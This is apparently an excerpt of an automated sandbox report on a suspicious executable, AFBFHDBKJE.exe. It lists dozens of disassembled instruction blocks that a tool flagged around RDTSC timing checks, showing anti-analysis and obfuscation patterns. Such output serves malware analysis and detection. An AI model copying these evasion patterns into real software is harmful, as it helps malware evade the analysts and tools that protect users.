Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0909 second address: 2E091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E091A second address: 2E09A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7FDD3F1871h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jno 00007F7FDD3F1884h 0x00000015 pop eax 0x00000016 mov esi, dword ptr [ebp+122D3157h] 0x0000001c add dword ptr [ebp+122D3351h], ebx 0x00000022 push 00000003h 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F7FDD3F1868h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D313Eh], eax 0x00000046 mov dword ptr [ebp+122D31D5h], esi 0x0000004c push 00000003h 0x0000004e cmc 0x0000004f push 9C94E584h 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 push edx 0x00000058 pop edx 0x00000059 pop ecx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E09A1 second address: 2E09CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F7FDCFD2296h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 5C94E584h 0x00000013 lea ebx, dword ptr [ebp+124555ABh] 0x00000019 sub ecx, 4AC77F77h 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7FDCFD229Bh 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E09CE second address: 2E09F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F7FDD3F1879h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7FDD3F186Bh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0A5E second address: 2E0A68 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2E0A68 second address: 2E0A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF426 second address: 2FF432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF432 second address: 2FF445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7FDD3F186Bh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF445 second address: 2FF44A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF44A second address: 2FF450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF450 second address: 2FF462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007F7FDCFD2296h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF462 second address: 2FF468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF5CE second address: 2FF5DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD2296h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF89A second address: 2FF8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF8A0 second address: 2FF8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FF8A4 second address: 2FF8D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jp 00007F7FDD3F186Ch 0x00000011 jp 00007F7FDD3F1866h 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFB42 second address: 2FFB48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFDE1 second address: 2FFDFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7FDD3F1866h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F7FDD3F186Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFF40 second address: 2FFF52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7FDCFD2296h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2FFF52 second address: 2FFF70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jg 00007F7FDD3F1879h 0x0000000f jmp 00007F7FDD3F186Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3000C1 second address: 3000C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3003BC second address: 3003D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E21 second address: 2F3E42 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDCFD2298h 0x00000008 jl 00007F7FDCFD229Ch 0x0000000e jo 00007F7FDCFD2296h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jc 00007F7FDCFD2296h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E42 second address: 2F3E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E46 second address: 2F3E50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2F3E50 second address: 2F3E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C0A second address: 300C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7FDCFD229Bh 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 jmp 00007F7FDCFD22A2h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C4B second address: 300C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300C4F second address: 300C53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300DA0 second address: 300DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 300DA6 second address: 300DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301077 second address: 30107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30107B second address: 301094 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7FDCFD2296h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F7FDCFD2298h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301094 second address: 301098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 301098 second address: 30109C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3084BA second address: 3084C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3084C0 second address: 3084C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30867D second address: 3086BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7FDD3F1868h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d jl 00007F7FDD3F186Eh 0x00000013 jl 00007F7FDD3F1868h 0x00000019 pushad 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F7FDD3F1878h 0x00000027 push esi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307520 second address: 307524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307524 second address: 307543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7FDD3F1875h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 307543 second address: 307548 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30DA65 second address: 30DA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F7FDD3F1866h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DD6 second address: 2D2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DE3 second address: 2D2DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 2D2DE7 second address: 2D2DF1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30D37C second address: 30D380 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 30D7D0 second address: 30D7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3105B8 second address: 3105F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1872h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7FDD3F1875h 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3105F0 second address: 310601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310601 second address: 310660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F7FDD3F186Ch 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 jmp 00007F7FDD3F1874h 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 pushad 0x00000024 js 00007F7FDD3F1873h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310A9A second address: 310AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A6h 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007F7FDCFD22B5h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7FDCFD22A3h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 310BF8 second address: 310BFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3112A8 second address: 3112AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 311366 second address: 31136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 311430 second address: 311435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3114D0 second address: 3114E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F1873h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31371D second address: 31372F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDCFD229Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3141A9 second address: 3141AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316E43 second address: 316EF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD229Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7FDCFD229Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 mov edi, dword ptr [ebp+122D2273h] 0x00000018 jbe 00007F7FDCFD22AEh 0x0000001e jmp 00007F7FDCFD22A8h 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F7FDCFD2298h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ch 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f call 00007F7FDCFD22A0h 0x00000044 pop edi 0x00000045 pushad 0x00000046 adc esi, 3CBBE3E1h 0x0000004c mov dword ptr [ebp+122D19FFh], edi 0x00000052 popad 0x00000053 xchg eax, ebx 0x00000054 push edi 0x00000055 pushad 0x00000056 jmp 00007F7FDCFD22A8h 0x0000005b push eax 0x0000005c pop eax 0x0000005d popad 0x0000005e pop edi 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 push ebx 0x00000065 pop ebx 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 316EF1 second address: 316EFB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 319484 second address: 31948E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 319A6E second address: 319B21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1878h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dword ptr [ebp+124533DCh], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F7FDD3F1868h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push esi 0x00000031 call 00007F7FDD3F1868h 0x00000036 pop esi 0x00000037 mov dword ptr [esp+04h], esi 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc esi 0x00000044 push esi 0x00000045 ret 0x00000046 pop esi 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2B5Bh], ecx 0x0000004e mov ebx, dword ptr [ebp+122D3C81h] 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 jmp 00007F7FDD3F1873h 0x0000005b jmp 00007F7FDD3F186Ch 0x00000060 popad 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F7FDD3F1876h 0x00000069 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB32 second address: 31AB3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB3C second address: 31AB9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 adc di, 7600h 0x0000000d push 00000000h 0x0000000f xor edi, 62AD5CCBh 0x00000015 push 00000000h 0x00000017 mov bx, 9500h 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d jmp 00007F7FDD3F1878h 0x00000022 jo 00007F7FDD3F186Ch 0x00000028 jno 00007F7FDD3F1866h 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 pushad 0x00000032 jng 00007F7FDD3F1866h 0x00000038 jmp 00007F7FDD3F1873h 0x0000003d popad 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31AB9F second address: 31ABA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31BBAD second address: 31BBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 312F15 second address: 312F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CC3C second address: 31CC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31ED1B second address: 31ED1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31ED1F second address: 31ED37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1874h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 315583 second address: 3155A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007F7FDCFD22A4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jc 00007F7FDCFD2296h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 323A9E second address: 323AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249B4 second address: 3249CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD22A4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249CD second address: 3249D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3249D3 second address: 3249D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325B14 second address: 325B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7FDD3F186Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 325B25 second address: 325B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326B32 second address: 326B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 326B36 second address: 326B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31CD83 second address: 31CD87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 31DE47 second address: 31DE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
